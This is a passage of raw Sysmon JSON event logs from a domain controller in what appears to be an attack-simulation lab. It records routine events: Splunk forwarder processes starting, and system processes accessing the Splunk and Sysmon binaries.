06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6682,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.304\r\nProcessGuid: {E2A3D6B1-12B1-5F25-0000-00106C6E0900}\r\nProcessId: 4820\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.304","ProcessGuid":"{E2A3D6B1-12B1-5F25-0000-00106C6E0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6683,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.303\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12B1-5F25-0000-00106C6E0900}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.303","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12B1-5F25-0000-00106C6E0900}","TargetProcessId":"4820","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6684,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.303\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B1-5F25-0000-00106C6E0900}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.303","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B1-5F25-0000-00106C6E0900}","TargetProcessId":"4820","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6685,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6686,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6687,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6688,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6689,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6690,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 